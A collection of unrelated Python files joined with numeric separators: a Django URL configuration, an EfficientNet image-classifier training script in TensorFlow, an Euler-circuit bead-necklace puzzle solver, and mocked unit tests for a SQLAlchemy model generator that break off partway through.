admin.autodiscover()
urlpatterns = [
url(r'^$', HomeView.as_view(), name='home'),
url(r'^', include('libretto.urls')),
url(r'^examens/', include('examens.urls')),
url(r'^presentation$',
TemplateView.as_view(template_name='pages/presentation.html'),
name='presentation'),
url(r'^contribuer$',
TemplateView.as_view(template_name='pages/contribute.html'),
name='contribuer'),
url(r'^bibliographie$', BibliographieView.as_view(), name='bibliographie'),
url(r'^', include('accounts.urls')),
url(r'^dossiers/', include('dossiers.urls')),
url(r'^admin/lookups/', include(ajax_select_urls)),
url(r'^admin/', admin.site.urls),
url(r'^i18n/', include('django.conf.urls.i18n')),
url(r'^tinymce/', include('tinymce.urls')),
url(r'^grappelli/', include('grappelli.urls')),
url(r'^recherche/', CustomSearchView(), name='haystack_search'),
url(r'^api-auth/', include('rest_framework.urls',
namespace='rest_framework')),
url(r'^autocomplete$', autocomplete, name='autocomplete'),
url(r'^rss\.xml$', RssFeed(), name='rss_feed'),
url(r'^sitemap.xml$', cache_page(24*60*60)(sitemap),
{'sitemaps': {'global': GlobalSitemap}},
name='django.contrib.sitemaps.views.sitemap'),
url(r'^404$', ErrorView.as_view(status=404)),
]
if settings.DEBUG:
urlpatterns += static(settings.STATIC_URL,
document_root=settings.STATIC_ROOT)
urlpatterns += static(settings.MEDIA_URL,
document_root=settings.MEDIA_ROOT)
import debug_toolbar
urlpatterns += [
url(r'^__debug__/', include(debug_toolbar.urls)),
url(r'^403$', ErrorView.as_view(status=403)),
url(r'^500$', ErrorView.as_view(status=500)),
url(r'^503$', ErrorView.as_view(status=503)),
]
|
15715
|
r"""Train an EfficientNet classifier.
Currently implementation of multi-label multi-class classification is
non-functional.
During training, start tensorboard from within the classification/ directory:
tensorboard --logdir run --bind_all --samples_per_plugin scalars=0,images=0
Example usage:
python train_classifier_tf.py run_idfg /ssd/crops_sq \
-m "efficientnet-b0" --pretrained --finetune --label-weighted \
--epochs 50 --batch-size 512 --lr 1e-4 \
--seed 123 \
--logdir run_idfg
"""
from __future__ import annotations
import argparse
from collections import defaultdict
from collections.abc import Callable, Mapping, MutableMapping, Sequence
from datetime import datetime
import json
import os
from typing import Any, Optional
import uuid
import numpy as np
import sklearn.metrics
import tensorflow as tf
from tensorboard.plugins.hparams import api as hp
import tqdm
from classification.train_utils import (
HeapItem, recall_from_confusion_matrix, add_to_heap, fig_to_img,
imgs_with_confidences, load_dataset_csv, prefix_all_keys)
from visualization import plot_utils
AUTOTUNE = tf.data.experimental.AUTOTUNE
# match pytorch EfficientNet model names
EFFICIENTNET_MODELS: Mapping[str, Mapping[str, Any]] = {
'efficientnet-b0': dict(cls='EfficientNetB0', img_size=224, dropout=0.2),
'efficientnet-b1': dict(cls='EfficientNetB1', img_size=240, dropout=0.2),
'efficientnet-b2': dict(cls='EfficientNetB2', img_size=260, dropout=0.3),
'efficientnet-b3': dict(cls='EfficientNetB3', img_size=300, dropout=0.3),
'efficientnet-b4': dict(cls='EfficientNetB4', img_size=380, dropout=0.4),
'efficientnet-b5': dict(cls='EfficientNetB5', img_size=456, dropout=0.4),
'efficientnet-b6': dict(cls='EfficientNetB6', img_size=528, dropout=0.5),
'efficientnet-b7': dict(cls='EfficientNetB7', img_size=600, dropout=0.5)
}
def create_dataset(
img_files: Sequence[str],
labels: Sequence[Any],
sample_weights: Optional[Sequence[float]] = None,
img_base_dir: str = '',
transform: Optional[Callable[[tf.Tensor], Any]] = None,
target_transform: Optional[Callable[[Any], Any]] = None,
cache: bool | str = False
) -> tf.data.Dataset:
"""Create a tf.data.Dataset.
The dataset returns elements (img, label, img_file, sample_weight) if
sample_weights is not None, or (img, label, img_file) if
sample_weights=None.
img: tf.Tensor, shape [H, W, 3], type uint8
label: tf.Tensor
img_file: tf.Tensor, scalar, type str
sample_weight: tf.Tensor, scalar, type float32
Possible TODO: oversample the imbalanced classes
see tf.data.experimental.sample_from_datasets
Args:
img_files: list of str, relative paths from img_base_dir
labels: list of int if multilabel=False
sample_weights: optional list of float
img_base_dir: str, base directory for images
transform: optional transform to apply to a single uint8 JPEG image
target_transform: optional transform to apply to a single label
cache: bool or str, cache images in memory if True, cache images to
a file on disk if a str
Returns: tf.data.Dataset
"""
# images dataset
img_ds = tf.data.Dataset.from_tensor_slices(img_files)
img_ds = img_ds.map(lambda p: tf.io.read_file(img_base_dir + os.sep + p),
num_parallel_calls=AUTOTUNE)
# for smaller disk / memory usage, we cache the raw JPEG bytes instead
# of the decoded Tensor
if isinstance(cache, str):
img_ds = img_ds.cache(cache)
elif cache:
img_ds = img_ds.cache()
# convert JPEG bytes to a 3D uint8 Tensor
# keras EfficientNet already includes normalization from [0, 255] to [0, 1],
# so we don't need to do that here
img_ds = img_ds.map(lambda img: tf.io.decode_jpeg(img, channels=3))
if transform:
img_ds = img_ds.map(transform, num_parallel_calls=AUTOTUNE)
# labels dataset
labels_ds = tf.data.Dataset.from_tensor_slices(labels)
if target_transform:
labels_ds = labels_ds.map(target_transform, num_parallel_calls=AUTOTUNE)
# img_files dataset
img_files_ds = tf.data.Dataset.from_tensor_slices(img_files)
if sample_weights is None:
return tf.data.Dataset.zip((img_ds, labels_ds, img_files_ds))
# weights dataset
weights_ds = tf.data.Dataset.from_tensor_slices(sample_weights)
return tf.data.Dataset.zip((img_ds, labels_ds, img_files_ds, weights_ds))
def create_dataloaders(
dataset_csv_path: str,
label_index_json_path: str,
splits_json_path: str,
cropped_images_dir: str,
img_size: int,
multilabel: bool,
label_weighted: bool,
weight_by_detection_conf: bool | str,
batch_size: int,
augment_train: bool,
cache_splits: Sequence[str]
) -> tuple[dict[str, tf.data.Dataset], list[str]]:
"""
Args:
dataset_csv_path: str, path to CSV file with columns
['dataset', 'location', 'label'], where label is a comma-delimited
list of labels
splits_json_path: str, path to JSON file
augment_train: bool, whether to shuffle/augment the training set
cache_splits: list of str, splits to cache
training set is cached at /mnt/tempds/random_file_name
validation and test sets are cached in memory
Returns:
datasets: dict, maps split to DataLoader
label_names: list of str, label names in order of label id
"""
df, label_names, split_to_locs = load_dataset_csv(
dataset_csv_path, label_index_json_path, splits_json_path,
multilabel=multilabel, label_weighted=label_weighted,
weight_by_detection_conf=weight_by_detection_conf)
# define the transforms
# efficientnet data preprocessing:
# - train:
# 1) random crop: aspect_ratio_range=(0.75, 1.33), area_range=(0.08, 1.0)
# 2) bicubic resize to img_size
# 3) random horizontal flip
# - test:
# 1) center crop
# 2) bicubic resize to img_size
@tf.function
def train_transform(img: tf.Tensor) -> tf.Tensor:
"""Returns: tf.Tensor, shape [img_size, img_size, C], type float32"""
img = tf.image.resize_with_pad(img, img_size, img_size,
method=tf.image.ResizeMethod.BICUBIC)
img = tf.image.random_flip_left_right(img)
img = tf.image.random_brightness(img, max_delta=0.25)
img = tf.image.random_contrast(img, lower=0.75, upper=1.25)
img = tf.image.random_saturation(img, lower=0.75, upper=1.25)
return img
@tf.function
def test_transform(img: tf.Tensor) -> tf.Tensor:
"""Returns: tf.Tensor, shape [img_size, img_size, C], type float32"""
img = tf.image.resize_with_pad(img, img_size, img_size,
method=tf.image.ResizeMethod.BICUBIC)
return img
dataloaders = {}
for split, locs in split_to_locs.items():
is_train = (split == 'train') and augment_train
split_df = df[df['dataset_location'].isin(locs)]
weights = None
if label_weighted or weight_by_detection_conf:
# weights sums to:
# - if weight_by_detection_conf: (# images in split - conf delta)
# - otherwise: (# images in split)
weights = split_df['weights'].tolist()
if not weight_by_detection_conf:
assert np.isclose(sum(weights), len(split_df))
cache: bool | str = (split in cache_splits)
if split == 'train' and 'train' in cache_splits:
unique_filename = str(uuid.uuid4())
os.makedirs('/mnt/tempds/', exist_ok=True)
cache = f'/mnt/tempds/{unique_filename}'
ds = create_dataset(
img_files=split_df['path'].tolist(),
labels=split_df['label_index'].tolist(),
sample_weights=weights,
img_base_dir=cropped_images_dir,
transform=train_transform if is_train else test_transform,
target_transform=None,
cache=cache)
if is_train:
ds = ds.shuffle(1000, reshuffle_each_iteration=True)
ds = ds.batch(batch_size).prefetch(buffer_size=AUTOTUNE)
dataloaders[split] = ds
return dataloaders, label_names
def build_model(model_name: str, num_classes: int, img_size: int,
pretrained: bool, finetune: bool) -> tf.keras.Model:
"""Creates a model with an EfficientNet base."""
class_name = EFFICIENTNET_MODELS[model_name]['cls']
dropout = EFFICIENTNET_MODELS[model_name]['dropout']
model_class = tf.keras.applications.__dict__[class_name]
weights = 'imagenet' if pretrained else None
inputs = tf.keras.layers.Input(shape=(img_size, img_size, 3))
base_model = model_class(
input_tensor=inputs, weights=weights, include_top=False, pooling='avg')
if finetune:
# freeze the base model's weights, including BatchNorm statistics
# https://www.tensorflow.org/guide/keras/transfer_learning#fine-tuning
base_model.trainable = False
# rebuild output
x = tf.keras.layers.Dropout(dropout, name='top_dropout')(base_model.output)
outputs = tf.keras.layers.Dense(
num_classes,
kernel_initializer=tf.keras.initializers.VarianceScaling(
scale=1. / 3., mode='fan_out', distribution='uniform'),
name='logits')(x)
model = tf.keras.Model(inputs, outputs, name='complete_model')
model.base_model = base_model # cache this so that we can turn off finetune
return model
def main(dataset_dir: str,
cropped_images_dir: str,
multilabel: bool,
model_name: str,
pretrained: bool,
finetune: int,
label_weighted: bool,
weight_by_detection_conf: bool | str,
epochs: int,
batch_size: int,
lr: float,
weight_decay: float,
seed: Optional[int] = None,
logdir: str = '',
cache_splits: Sequence[str] = ()) -> None:
"""Main function."""
# input validation
assert os.path.exists(dataset_dir)
assert os.path.exists(cropped_images_dir)
if isinstance(weight_by_detection_conf, str):
assert os.path.exists(weight_by_detection_conf)
# set seed
seed = np.random.randint(10_000) if seed is None else seed
np.random.seed(seed)
tf.random.set_seed(seed)
# create logdir and save params
params = dict(locals()) # make a copy
timestamp = datetime.now().strftime('%Y%m%d_%H%M%S') # '20200722_110816'
logdir = os.path.join(logdir, timestamp)
os.makedirs(logdir, exist_ok=True)
print('Created logdir:', logdir)
with open(os.path.join(logdir, 'params.json'), 'w') as f:
json.dump(params, f, indent=1)
gpus = tf.config.experimental.list_physical_devices('GPU')
for gpu in gpus:
tf.config.experimental.set_memory_growth(gpu, True)
img_size = EFFICIENTNET_MODELS[model_name]['img_size']
# create dataloaders and log the index_to_label mapping
loaders, label_names = create_dataloaders(
dataset_csv_path=os.path.join(dataset_dir, 'classification_ds.csv'),
label_index_json_path=os.path.join(dataset_dir, 'label_index.json'),
splits_json_path=os.path.join(dataset_dir, 'splits.json'),
cropped_images_dir=cropped_images_dir,
img_size=img_size,
multilabel=multilabel,
label_weighted=label_weighted,
weight_by_detection_conf=weight_by_detection_conf,
batch_size=batch_size,
augment_train=True,
cache_splits=cache_splits)
writer = tf.summary.create_file_writer(logdir)
writer.set_as_default()
model = build_model(
model_name, num_classes=len(label_names), img_size=img_size,
pretrained=pretrained, finetune=finetune > 0)
# define loss function and optimizer
loss_fn: tf.keras.losses.Loss
if multilabel:
loss_fn = tf.keras.losses.BinaryCrossentropy(
from_logits=True, reduction=tf.keras.losses.Reduction.NONE)
else:
loss_fn = tf.keras.losses.SparseCategoricalCrossentropy(
from_logits=True, reduction=tf.keras.losses.Reduction.NONE)
# using EfficientNet training defaults
# - batch norm momentum: 0.99
# - optimizer: RMSProp, decay 0.9 and momentum 0.9
# - epochs: 350
# - learning rate: 0.256, decays by 0.97 every 2.4 epochs
# - weight decay: 1e-5
lr_schedule = tf.keras.optimizers.schedules.ExponentialDecay(
lr, decay_steps=1, decay_rate=0.97, staircase=True)
optimizer = tf.keras.optimizers.RMSprop(
learning_rate=lr, rho=0.9, momentum=0.9)
best_epoch_metrics: dict[str, float] = {}
for epoch in range(epochs):
print(f'Epoch: {epoch}')
optimizer.learning_rate = lr_schedule(epoch)
tf.summary.scalar('lr', optimizer.learning_rate, epoch)
if epoch > 0 and finetune == epoch:
print('Turning off fine-tune!')
model.base_model.trainable = True
print('- train:')
# TODO: change weighted to False if oversampling minority classes
train_metrics, train_heaps, train_cm = run_epoch(
model, loader=loaders['train'], weighted=label_weighted,
loss_fn=loss_fn, weight_decay=weight_decay, optimizer=optimizer,
finetune=finetune > epoch, return_extreme_images=True)
train_metrics = prefix_all_keys(train_metrics, prefix='train/')
log_run('train', epoch, writer, label_names,
metrics=train_metrics, heaps=train_heaps, cm=train_cm)
print('- val:')
val_metrics, val_heaps, val_cm = run_epoch(
model, loader=loaders['val'], weighted=label_weighted,
loss_fn=loss_fn, return_extreme_images=True)
val_metrics = prefix_all_keys(val_metrics, prefix='val/')
log_run('val', epoch, writer, label_names,
metrics=val_metrics, heaps=val_heaps, cm=val_cm)
if val_metrics['val/acc_top1'] > best_epoch_metrics.get('val/acc_top1', 0): # pylint: disable=line-too-long
filename = os.path.join(logdir, f'ckpt_{epoch}.h5')
print(f'New best model! Saving checkpoint to {filename}')
model.save(filename)
best_epoch_metrics.update(train_metrics)
best_epoch_metrics.update(val_metrics)
best_epoch_metrics['epoch'] = epoch
print('- test:')
test_metrics, test_heaps, test_cm = run_epoch(
model, loader=loaders['test'], weighted=label_weighted,
loss_fn=loss_fn, return_extreme_images=True)
test_metrics = prefix_all_keys(test_metrics, prefix='test/')
log_run('test', epoch, writer, label_names,
metrics=test_metrics, heaps=test_heaps, cm=test_cm)
# stop training after 8 epochs without improvement
if epoch >= best_epoch_metrics['epoch'] + 8:
break
hparams_dict = {
'model_name': model_name,
'multilabel': multilabel,
'finetune': finetune,
'batch_size': batch_size,
'epochs': epochs
}
hp.hparams(hparams_dict)
writer.close()
def log_run(split: str, epoch: int, writer: tf.summary.SummaryWriter,
label_names: Sequence[str], metrics: MutableMapping[str, float],
heaps: Mapping[str, Mapping[int, list[HeapItem]]], cm: np.ndarray
) -> None:
"""Logs the outputs (metrics, confusion matrix, tp/fp/fn images) from a
single epoch run to Tensorboard.
Args:
metrics: dict, keys already prefixed with {split}/
"""
per_class_recall = recall_from_confusion_matrix(cm, label_names)
metrics.update(prefix_all_keys(per_class_recall, f'{split}/label_recall/'))
# log metrics
for metric, value in metrics.items():
tf.summary.scalar(metric, value, epoch)
# log confusion matrix
cm_fig = plot_utils.plot_confusion_matrix(cm, classes=label_names,
normalize=True)
cm_fig_img = tf.convert_to_tensor(fig_to_img(cm_fig)[np.newaxis, ...])
tf.summary.image(f'confusion_matrix/{split}', cm_fig_img, step=epoch)
# log tp/fp/fn images
for heap_type, heap_dict in heaps.items():
log_images_with_confidence(heap_dict, label_names, epoch=epoch,
tag=f'{split}/{heap_type}')
writer.flush()
def log_images_with_confidence(
heap_dict: Mapping[int, list[HeapItem]],
label_names: Sequence[str],
epoch: int,
tag: str) -> None:
"""
Args:
heap_dict: dict, maps label_id to list of HeapItem, where each HeapItem
data is a list [img, target, top3_conf, top3_preds, img_file],
and img is a tf.Tensor of shape [H, W, 3]
label_names: list of str, label names in order of label id
epoch: int
tag: str
"""
for label_id, heap in heap_dict.items():
label_name = label_names[label_id]
sorted_heap = sorted(heap, reverse=True) # sort largest to smallest
imgs_list = [item.data for item in sorted_heap]
fig, img_files = imgs_with_confidences(imgs_list, label_names)
# tf.summary.image requires input of shape [N, H, W, C]
fig_img = tf.convert_to_tensor(fig_to_img(fig)[np.newaxis, ...])
tf.summary.image(f'{label_name}/{tag}', fig_img, step=epoch)
tf.summary.text(f'{label_name}/{tag}_files', '\n\n'.join(img_files),
step=epoch)
def track_extreme_examples(tp_heaps: dict[int, list[HeapItem]],
fp_heaps: dict[int, list[HeapItem]],
fn_heaps: dict[int, list[HeapItem]],
inputs: tf.Tensor,
labels: tf.Tensor,
img_files: tf.Tensor,
logits: tf.Tensor) -> None:
"""Updates the 5 most extreme true-positive (tp), false-positive (fp), and
false-negative (fn) examples with examples from this batch.
Each HeapItem's data attribute is a tuple with:
- img: np.ndarray, shape [H, W, 3], type uint8
- label: int
- top3_conf: list of float
- top3_preds: list of float
- img_file: str
Args:
*_heaps: dict, maps label_id (int) to heap of HeapItems
inputs: tf.Tensor, shape [batch_size, H, W, 3], type float32
labels: tf.Tensor, shape [batch_size]
img_files: tf.Tensor, shape [batch_size], type tf.string
logits: tf.Tensor, shape [batch_size, num_classes]
"""
labels = labels.numpy().tolist()
inputs = inputs.numpy().astype(np.uint8)
img_files = img_files.numpy().astype(str).tolist()
batch_probs = tf.nn.softmax(logits, axis=1)
iterable = zip(labels, inputs, img_files, batch_probs)
for label, img, img_file, confs in iterable:
label_conf = confs[label].numpy().item()
top3_conf, top3_preds = tf.math.top_k(confs, k=3, sorted=True)
top3_conf = top3_conf.numpy().tolist()
top3_preds = top3_preds.numpy().tolist()
data = (img, label, top3_conf, top3_preds, img_file)
if top3_preds[0] == label: # true positive
item = HeapItem(priority=label_conf - top3_conf[1], data=data)
add_to_heap(tp_heaps[label], item, k=5)
else:
# false positive for top3_pred[0]
# false negative for label
item = HeapItem(priority=top3_conf[0] - label_conf, data=data)
add_to_heap(fp_heaps[top3_preds[0]], item, k=5)
add_to_heap(fn_heaps[label], item, k=5)
def run_epoch(model: tf.keras.Model,
loader: tf.data.Dataset,
weighted: bool,
top: Sequence[int] = (1, 3),
loss_fn: Optional[tf.keras.losses.Loss] = None,
weight_decay: float = 0,
finetune: bool = False,
optimizer: Optional[tf.keras.optimizers.Optimizer] = None,
return_extreme_images: bool = False
) -> tuple[
dict[str, float],
dict[str, dict[int, list[HeapItem]]],
np.ndarray
]:
"""Runs for 1 epoch.
Args:
model: tf.keras.Model
loader: tf.data.Dataset
weighted: bool, whether to use sample weights in calculating loss and
accuracy
top: tuple of int, list of values of k for calculating top-K accuracy
loss_fn: optional loss function, calculates the mean loss over a batch
weight_decay: float, L2-regularization constant
finetune: bool, if true sets model's dropout and BN layers to eval mode
optimizer: optional optimizer
Returns:
metrics: dict, metrics from epoch, contains keys:
'loss': float, mean per-example loss over entire epoch,
only included if loss_fn is not None
'acc_top{k}': float, accuracy@k over the entire epoch
heaps: dict, keys are ['tp', 'fp', 'fn'], values are heap_dicts,
each heap_dict maps label_id (int) to a heap of <= 5 HeapItems with
data attribute (img, target, top3_conf, top3_preds, img_file)
- 'tp': priority is the difference between target confidence and
2nd highest confidence
- 'fp': priority is the difference between highest confidence and
target confidence
- 'fn': same as 'fp'
confusion_matrix: np.ndarray, shape [num_classes, num_classes],
C[i, j] = # of samples with true label i, predicted as label j
"""
# if evaluating or finetuning, set dropout & BN layers to eval mode
is_train = False
train_dropout_and_bn = False
if optimizer is not None:
assert loss_fn is not None
is_train = True
if not finetune:
train_dropout_and_bn = True
reg_vars = [
v for v in model.trainable_variables if 'kernel' in v.name]
if loss_fn is not None:
losses = tf.keras.metrics.Mean()
accuracies_topk = {
k: tf.keras.metrics.SparseTopKCategoricalAccuracy(k) for k in top
}
# for each label, track 5 most-confident and least-confident examples
tp_heaps: dict[int, list[HeapItem]] = defaultdict(list)
fp_heaps: dict[int, list[HeapItem]] = defaultdict(list)
fn_heaps: dict[int, list[HeapItem]] = defaultdict(list)
all_labels = []
all_preds = []
tqdm_loader = tqdm.tqdm(loader)
for batch in tqdm_loader:
if weighted:
inputs, labels, img_files, weights = batch
else:
# even if batch contains sample weights, don't use them
inputs, labels, img_files = batch[0:3]
weights = None
all_labels.append(labels.numpy())
desc = []
with tf.GradientTape(watch_accessed_variables=is_train) as tape:
outputs = model(inputs, training=train_dropout_and_bn)
if loss_fn is not None:
loss = loss_fn(labels, outputs)
if weights is not None:
loss *= weights
# we do not track L2-regularization loss in the loss metric
losses.update_state(loss, sample_weight=weights)
desc.append(f'Loss {losses.result().numpy():.4f}')
if optimizer is not None:
loss = tf.math.reduce_mean(loss)
if not finetune: # only regularize layers before the final FC
loss += weight_decay * tf.add_n(
tf.nn.l2_loss(v) for v in reg_vars)
all_preds.append(tf.math.argmax(outputs, axis=1).numpy())
if optimizer is not None:
gradients = tape.gradient(loss, model.trainable_variables)
optimizer.apply_gradients(zip(gradients, model.trainable_variables))
for k, acc in accuracies_topk.items():
acc.update_state(labels, outputs, sample_weight=weights)
desc.append(f'Acc@{k} {acc.result().numpy() * 100:.3f}')
tqdm_loader.set_description(' '.join(desc))
if return_extreme_images:
track_extreme_examples(tp_heaps, fp_heaps, fn_heaps, inputs,
labels, img_files, outputs)
confusion_matrix = sklearn.metrics.confusion_matrix(
y_true=np.concatenate(all_labels), y_pred=np.concatenate(all_preds))
metrics = {}
if loss_fn is not None:
metrics['loss'] = losses.result().numpy().item()
for k, acc in accuracies_topk.items():
metrics[f'acc_top{k}'] = acc.result().numpy().item() * 100
heaps = {'tp': tp_heaps, 'fp': fp_heaps, 'fn': fn_heaps}
return metrics, heaps, confusion_matrix
def _parse_args() -> argparse.Namespace:
"""Parses arguments."""
parser = argparse.ArgumentParser(
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
description='Trains classifier.')
parser.add_argument(
'dataset_dir',
help='path to directory containing: 1) classification dataset CSV, '
'2) label index JSON, 3) splits JSON')
parser.add_argument(
'cropped_images_dir',
help='path to local directory where image crops are saved')
parser.add_argument(
'--multilabel', action='store_true',
help='for multi-label, multi-class classification')
parser.add_argument(
'-m', '--model-name', default='efficientnet-b0',
choices=list(EFFICIENTNET_MODELS.keys()),
help='which EfficientNet model')
parser.add_argument(
'--pretrained', action='store_true',
help='start with pretrained model')
parser.add_argument(
'--finetune', type=int, default=0,
help='only fine tune the final fully-connected layer for the first '
'<finetune> epochs')
parser.add_argument(
'--label-weighted', action='store_true',
help='weight training samples to balance labels')
parser.add_argument(
'--weight-by-detection-conf', nargs='?', const=True, default=False,
help='weight training examples by detection confidence. '
'Optionally takes a .npz file for isotonic calibration.')
parser.add_argument(
'--epochs', type=int, default=0,
help='number of epochs for training, 0 for eval-only')
parser.add_argument(
'--batch-size', type=int, default=256,
help='batch size for both training and eval')
parser.add_argument(
'--lr', type=float, default=None,
help='initial learning rate, defaults to (0.016 * batch_size / 256)')
parser.add_argument(
'--weight-decay', type=float, default=1e-5,
help='weight decay')
parser.add_argument(
'--seed', type=int,
help='random seed')
parser.add_argument(
'--logdir', default='.',
help='directory where TensorBoard logs and a params file are saved')
parser.add_argument(
'--cache', nargs='*', choices=['train', 'val', 'test'], default=(),
help='which splits of the dataset to cache')
return parser.parse_args()
if __name__ == '__main__':
args = _parse_args()
if args.lr is None:
args.lr = 0.016 * args.batch_size / 256 # based on TF models repo
main(dataset_dir=args.dataset_dir,
cropped_images_dir=args.cropped_images_dir,
multilabel=args.multilabel,
model_name=args.model_name,
pretrained=args.pretrained,
finetune=args.finetune,
label_weighted=args.label_weighted,
weight_by_detection_conf=args.weight_by_detection_conf,
epochs=args.epochs,
batch_size=args.batch_size,
lr=args.lr,
weight_decay=args.weight_decay,
seed=args.seed,
logdir=args.logdir,
cache_splits=args.cache)
|
15718
|
from sys import stdin
from collections import defaultdict, deque
MAX_COLORS = 51
def load_num():
return int(stdin.readline())
def load_pair():
return tuple(map(int, stdin.readline().split()))
def load_case():
nbeads = load_num()
return [load_pair() for b in range(nbeads)]
def build_necklace(beads):
"""Construct an euler circuit in the graph defined by the beads"""
# For a graph to have an euler circuit all vertices must have
# even degree. (Plus 0 or 2 odd vertices) Init and ckeck degree
amatrix = [defaultdict(int) for _ in range(MAX_COLORS)]
degree = defaultdict(int)
for b in beads:
amatrix[b[0]][b[1]] += 1
amatrix[b[1]][b[0]] += 1
degree[b[0]] +=1
degree[b[1]] +=1
for k, v in degree.items():
if v%2 != 0:
return None
# Create necklace using Fleury's algorithm
def get_next_bead(color):
""" """
s_color, s_degree = 0, 0
for col, deg in amatrix[color].items():
if deg > s_degree:
s_color, s_degree = col, deg
if s_degree>0:
amatrix[color][s_color] -= 1
amatrix[s_color][color] -= 1
return (color, s_color)
else:
return None
# Start construction
nxt = get_next_bead(beads[0][1])
necklace = deque([nxt])
while True:
nxt = get_next_bead(necklace[-1][1])
if nxt:
necklace.append(nxt)
elif len(beads) != len(necklace):
# Created a closed cycle.move last segment to the start
prev = necklace.pop()
necklace.appendleft(prev)
else:
break
return necklace
if __name__ == '__main__':
ncases = load_num()
for c in range(ncases):
beads = load_case()
necklace = build_necklace(beads)
# Print result
print("Case #{}".format(c+1))
if necklace:
# Print all necklace beads together for faster IO (damn timelimits)
# Almost a third of the time is wasted on IO
necklace_str = ""
for b in necklace:
necklace_str += "{} {}\n".format(b[0], b[1])
else:
necklace_str = "some beads may be lost\n"
if c+1 == ncases:
print(necklace_str[:-1])
else:
print(necklace_str)
|
15766
|
from unittest import TestCase, mock
from modelgen import ModelGenerator, Base
from os import getcwd, path
class TestModelgen(TestCase):
@classmethod
def setUpClass(self):
self.yaml = {'tables': {'userinfo':{'columns':
[{'name': 'firstname', 'type': 'varchar'},
{'name': 'lastname', 'type': 'varchar'},
{'name': 'dob', 'type': 'date'},
{'name': 'contact', 'type': 'numeric'},
{'name': 'address', 'type': 'varchar'}]}}}
self.logger = Base().logger
@mock.patch('modelgen.modelgenerator.Validate')
@mock.patch('modelgen.ModelGenerator.__init__')
@mock.patch('modelgen.modelgenerator.Helper.write_to_file')
@mock.patch('modelgen.modelgenerator.Path')
@mock.patch('modelgen.modelgenerator.Parser')
@mock.patch('modelgen.modelgenerator.Template')
def test_create_model_wo_alembic(self, mock_templt, mock_prsr, mock_pth,
mock_wrtf, mock_init, mock_validate):
'''
Test create_model function without setting alembic
support to True
'''
mock_init.return_value = None
mock_validate.validate.return_value = True
mock_wrtf.return_value = True
mock_prsr.data.return_value = self.yaml
model_obj = ModelGenerator()
response = model_obj._create_model('test')
self.assertEqual(True, response)
mock_prsr.assert_called_with(filepath=path.join(getcwd(), 'templates/test.yaml'))
mock_wrtf.assert_called_with(path=path.join(getcwd(), 'models/test.py'),
data=mock_templt().render())
@mock.patch('modelgen.modelgenerator.ModelGenerator._create_alembic_meta')
@mock.patch('modelgen.modelgenerator.Validate')
@mock.patch('modelgen.ModelGenerator.__init__')
@mock.patch('modelgen.modelgenerator.Helper.write_to_file')
@mock.patch('modelgen.modelgenerator.Path')
@mock.patch('modelgen.modelgenerator.Parser')
@mock.patch('modelgen.modelgenerator.Template')
def test_create_model_w_alembic(self, mock_templt, mock_prsr, mock_pth,
mock_wrtf, mock_init, mock_validate, mock_cam):
'''
Test _create_model function with setting alembic
support to True
'''
mock_init.return_value = None
mock_validate.validate.return_value = True
mock_wrtf.return_value = True
mock_prsr.data.return_value = self.yaml
mock_cam.return_value = True
model_obj = ModelGenerator()
response = model_obj._create_model(datasource='./test', alembic=True)
self.assertEqual(True, response)
mock_prsr.assert_called_with(filepath=path.join(getcwd(), 'templates/./test.yaml'))
mock_wrtf.assert_called_with(path=path.join(getcwd(), 'models/./test.py'),
data=mock_templt().render())
@mock.patch('modelgen.modelgenerator.Validate')
@mock.patch('modelgen.ModelGenerator.__init__')
@mock.patch('modelgen.modelgenerator.Helper.write_to_file')
@mock.patch('modelgen.modelgenerator.Path')
@mock.patch('modelgen.modelgenerator.Parser')
@mock.patch('modelgen.modelgenerator.Template')
def test_create_alembic_meta(self, mock_templt, mock_prsr, mock_pth,
mock_wrtf, mock_init, mock_validate):
'''
Test _create_alembic_meta function. Function creates
alembic support by a folder called metadata and
a file __init__.py in the folder. This file contains
sqlalchemy metadata imported from all the sqlalchemy
model files
'''
mock_init.return_value = None
mock_validate.validate.return_value = True
mock_wrtf.return_value = True
mock_prsr.data.return_value = self.yaml
model_obj = ModelGenerator()
response = model_obj._create_alembic_meta()
self.assertEqual(True, response)
mock_wrtf.assert_called_with(path=path.join(getcwd(), 'metadata/__init__.py'),
data=mock_templt().render())
@mock.patch('modelgen.modelgenerator.path')
@mock.patch('modelgen.modelgenerator.Path')
@mock.patch('modelgen.modelgenerator.copyfile')
def test_create_template_folder(self, mock_cpyfile, mock_pth, mock_ospth):
'''
Test _create_template_folder function. Function creates
templates folder structure when modelgen is initialized
'''
mock_ospth.join.side_effects = ['./test', './test', './test', './test']
mock_ospth.exists.return_value = False
mock_pth.mkdir.return_value = True
mock_cpyfile.return_value = True
model_obj = ModelGenerator()
response = model_obj._create_template_folder(init='./testfolder')
self.assertEqual(response, True)
mock_cpyfile.assert_called_with(mock_ospth.join(), mock_ospth.join())
@mock.patch('modelgen.ModelGenerator._create_alembic_folder')
@mock.patch('modelgen.modelgenerator.Path')
@mock.patch('modelgen.modelgenerator.path')
@mock.patch('modelgen.modelgenerator.copyfile')
def test_create_template_folder_exists(self, mock_cpyfile, mock_ospth, mock_pth, mock_caf):
'''
Test _create_template_folder function when folder already exists
Function throws FileExistsError.
'''
mock_pth.mkdir.return_value = FileExistsError
mock_caf.return_value = True
mock_ospth.join.side_effects = ['./test', './test', './test', './test']
mock_ospth.exists.return_value = True
mock_cpyfile.return_value = True
model_obj = ModelGenerator()
with self.assertRaises(FileExistsError) as err:
model_obj._create_template_folder(init='./models')
@mock.patch('modelgen.modelgenerator.copytree')
@mock.patch('modelgen.modelgenerator.path')
@mock.patch('modelgen.modelgenerator.Path')
@mock.patch('modelgen.modelgenerator.copyfile')
def test_create_alembic_folder(self, mock_cpyfile, mock_pth, mock_ospth,
mock_cptr):
'''
Test _create_alembic_folder function. Tests the
creation of folders alembic/versions, alembic/alembic.ini,
alembic/env.py. Relative path is passed in this
test
'''
mock_cptr.return_value = True
mock_ospth.join.return_value = './testfolder'
mock_ospth.isabs.return_value = False
mock_ospth.exists.return_value = False
mock_pth.mkdir.return_value = True
mock_cpyfile.return_value = True
model_obj = ModelGenerator()
response = model_obj._create_alembic_folder(init='./testfolder')
self.assertEqual(response, True)
mock_cptr.assert_called_with(mock_ospth.join(), mock_ospth.join())
@mock.patch('modelgen.modelgenerator.copytree')
@mock.patch('modelgen.modelgenerator.path')
@mock.patch('modelgen.modelgenerator.Path')
@mock.patch('modelgen.modelgenerator.copyfile')
def test_create_alembic_folder_absolute_path(self, mock_cpyfile, mock_pth, mock_ospth,
mock_cptr):
'''
